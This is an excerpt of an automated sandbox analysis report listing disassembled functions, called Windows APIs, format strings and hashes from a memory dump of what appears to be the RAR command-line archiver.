                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CompareString
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1825529933-0
                                                                                                                                                                                                                                • Opcode ID: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
                                                                                                                                                                                                                                • Instruction ID: a20a46d79a5e4e73c485fbcaed8de82c86fbc0424061b1715aab7702d3d439ac
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6014F6170CA9245EB106B16A40406AA721AB9AFC4F6C4874EFAD8BB9AFE3DD0474704
                                                                                                                                                                                                                                Function 00007FF6FAA44554 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseFind
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1863332320-0
                                                                                                                                                                                                                                • Opcode ID: 86a096c0879f1b9d169584fab09b4cfda0d24ba67280b30728083c95e77eed4d
                                                                                                                                                                                                                                • Instruction ID: 12d78bdb13e9332487f4a98ac74d055ba88f2c882374ab01748cfaf0188250ed
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 86a096c0879f1b9d169584fab09b4cfda0d24ba67280b30728083c95e77eed4d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7F0F9219082C147DF409B7451012F82310BF06BB5F1843B4EE7C4B3DBDE5C948E8721
                                                                                                                                                                                                                                Function 00007FF6FAA84AB4 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                • Opcode ID: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
                                                                                                                                                                                                                                • Instruction ID: f0ccc45034da2836f5ad9dbefef453d70d9256f7edfd0b68a57a8f2c7553b272
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C1F01221F4D2C242FF586BB1594127663905F447A0F4C46B4ED3EC93C1FE5CE89B4214
                                                                                                                                                                                                                                Function 00007FF6FAA538A4 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                                                                                                                                                                                                • Instruction ID: 6143207fb81641e74561400ee0772b44ce558edf0ab4ac3669bba5fdf7287f76
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CEE04F94F2970645FF5C2626286107902411F9AB80E1454B8CC3E863C2FD1EA05F1628
                                                                                                                                                                                                                                Function 00007FF6FAA8FA10 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                                                                                • Opcode ID: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
                                                                                                                                                                                                                                • Instruction ID: 9d8b2b5551e26d2a100feff5ae6816f94da7bb10d2c38ec81f545aa5474527bd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 54D09E76F1A90785F706DB41E84573412617F5879AF5106B4C43DC55D1EFBDE05E8340
                                                                                                                                                                                                                                Function 00007FF6FAA44538 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FindClose.KERNELBASE(00000000,?,00000000,?,00007FF6FAA67A8C), ref: 00007FF6FAA44549
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseFind
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1863332320-0
                                                                                                                                                                                                                                • Opcode ID: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                                                                                                                                                                                                • Instruction ID: 3e7c32d9ba7c8f3a3bbdd20c0e35e5f046df05ae3ff63ac97e85085ba7d31b4e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65C02B21E0148182CB44532D88451341110BF48735FE00370D13E451F0DF1858FF0300
                                                                                                                                                                                                                                Function 00007FF6FAA41930 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                                                                • Opcode ID: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                                                                                                                                                                                                • Instruction ID: 250e38e22614c46f1ce7cf9a5c01aa31efe2b4277abd9f1f3516fddc9e58b60c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3F02222A0834245FB258F60E4403783650EF00BB8F995370EA3D810EAEF39C89BC350

                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                Function 00007FF6FAA467E0 Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 441COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA649F4: LoadStringW.USER32 ref: 00007FF6FAA64A7B
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA649F4: LoadStringW.USER32 ref: 00007FF6FAA64A94
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA6B6D0: Sleep.KERNEL32(?,?,?,?,00007FF6FAA3CBED,?,00000000,?,00007FF6FAA67A8C), ref: 00007FF6FAA6B730
                                                                                                                                                                                                                                • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6FAA46CB0
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LoadString$Sleepfflushswprintf
                                                                                                                                                                                                                                • String ID: %12ls: %ls$%12ls: %ls$%21ls %-16ls %u$%21ls %9ls %3d%% %-27ls %u$%s: $%s: %s$----------- --------- -------- ----- ---------- ----- -------- ----$----------- --------- ---------- ----- ----$%.10ls %u$%21ls %18s %lu$%21ls %9ls %3d%% %28ls %u$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$EOF$RAR 1.4$RAR 4$RAR 5$V
                                                                                                                                                                                                                                • API String ID: 668332963-4283793440
                                                                                                                                                                                                                                • Opcode ID: 42bb3ba92369322cee946050bf619a3c7a8610c4ef9213de2fd911fc31fd2034
                                                                                                                                                                                                                                • Instruction ID: e0c11290221466017725a67c46680d3369b73a62cbdbe4c358159678b67aefc6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42bb3ba92369322cee946050bf619a3c7a8610c4ef9213de2fd911fc31fd2034
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1722DA22A0C6C255EB60DB24D9410F967A1FF45744F4450B6EA9D876EAFF2EE60FC700
                                                                                                                                                                                                                                Function 00007FF6FAA3D2C0 Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 313fileCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateFileW.KERNEL32 ref: 00007FF6FAA3D4A6
                                                                                                                                                                                                                                • CloseHandle.KERNEL32 ref: 00007FF6FAA3D4B9
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA3EF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6FAA3EE47), ref: 00007FF6FAA3EF73
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA3EF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF6FAA3EE47), ref: 00007FF6FAA3EF84
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA3EF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF6FAA3EFA7
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA3EF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF6FAA3EFCA
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA3EF50: GetLastError.KERNEL32 ref: 00007FF6FAA3EFD4
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA3EF50: CloseHandle.KERNEL32 ref: 00007FF6FAA3EFE7
                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32 ref: 00007FF6FAA3D4C6
                                                                                                                                                                                                                                • CreateFileW.KERNEL32 ref: 00007FF6FAA3D64A
                                                                                                                                                                                                                                • DeviceIoControl.KERNEL32 ref: 00007FF6FAA3D68B
                                                                                                                                                                                                                                • CloseHandle.KERNEL32 ref: 00007FF6FAA3D69A
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00007FF6FAA3D6AD
                                                                                                                                                                                                                                • RemoveDirectoryW.KERNEL32 ref: 00007FF6FAA3D6FA
                                                                                                                                                                                                                                • DeleteFileW.KERNEL32 ref: 00007FF6FAA3D705
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA42310: FlushFileBuffers.KERNEL32 ref: 00007FF6FAA4233E
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA42310: SetFileTime.KERNEL32 ref: 00007FF6FAA423DB
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA41930: CloseHandle.KERNELBASE ref: 00007FF6FAA41958
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA439E0: SetFileAttributesW.KERNEL32(?,00007FF6FAA434EE,?,?,?,?,00000800,00000000,00000000,00007FF6FAA538CB,?,?,?,00007FF6FAA541EC), ref: 00007FF6FAA43A0F
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA439E0: SetFileAttributesW.KERNEL32(?,00007FF6FAA434EE,?,?,?,?,00000800,00000000,00000000,00007FF6FAA538CB,?,?,?,00007FF6FAA541EC), ref: 00007FF6FAA43A3C
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$CloseHandle$Create$AttributesDirectoryErrorLastProcessToken$AdjustBuffersControlCurrentDeleteDeviceFlushLookupOpenPrivilegePrivilegesRemoveTimeValue
                                                                                                                                                                                                                                • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                                                                                                                • API String ID: 2750113785-3508440684
                                                                                                                                                                                                                                • Opcode ID: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
                                                                                                                                                                                                                                • Instruction ID: 76b45633b32183103ba1018613e24c02a694a5d08b873fc2440ae8764f410e4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86D1CD26A1878696EB609F60E9412F973A0FF44798F404171EAAD876D9EF3DD60FC700
                                                                                                                                                                                                                                Function 00007FF6FAA6AE50 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 281libraryloaderCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6FAA22E4C), ref: 00007FF6FAA6AEE9
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6FAA22E4C), ref: 00007FF6FAA6AF01
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6FAA22E4C), ref: 00007FF6FAA6AF19
                                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6FAA22E4C), ref: 00007FF6FAA6AF75
                                                                                                                                                                                                                                • GetFullPathNameA.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6FAA22E4C), ref: 00007FF6FAA6AFB0
                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6FAA22E4C), ref: 00007FF6FAA6B23B
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6FAA22E4C), ref: 00007FF6FAA6B244
